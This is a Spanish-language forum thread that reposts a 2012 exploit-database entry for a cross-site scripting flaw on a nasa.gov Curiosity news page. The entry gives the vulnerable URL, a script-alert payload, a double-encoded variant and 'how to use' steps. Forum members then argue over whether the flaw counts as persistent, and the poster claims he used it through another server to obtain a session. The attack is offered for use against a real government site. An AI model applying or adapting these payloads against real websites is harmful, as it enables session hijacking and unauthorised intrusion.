XSS Persistent NASA.GOV

Iniciado por CalebBucker, Agosto 23, 2012, 08:54:06 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Código: text
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy!

# 1337day.com [2012-08-22]
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buena esa man xd , nose que hacias mirando ahi la verdad xd.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Buscando marcianos jajajaja (broma)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
solo un pekeño detalle
esos no son xss persistentes :3

Lo considero PERSISTENTE, porque antes que sea REPORTADA, pude hacer muchas cosas, cosa que con el NO PERSISTENTE no se puede llegar hacer.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
disculpa pero persistente son los css en los cuales se inyecta el codigo y keda activo en el sitio sin tener ke poner la url con el codigo o mandando con dom, como en guestbooks ke dejas un comntario con un xss y el admin o kien lo vea se ejecuta el codigo sin tener ke mandarle la url con modificacion en ella :3

Tratas de decir que los XSS Persistentes son cuando un atacante inyecta el code javascript y queda grabado en el sitio? EPIC FAIL -_-

No compares un Modulo con un guestbooks, las cuales estan programadas para que cualquiera que lo vea, pueda leer el code.

Como te vuelvo a repetir, lo considero Persistente porque pude hacer pruebas mediante otro servidor para obtener una session y otras cosas mas.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Chicos Veo q el tema se esta desviando por favor Peleas fuera del foro, o me vere Obligado a cerrar el tema.

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".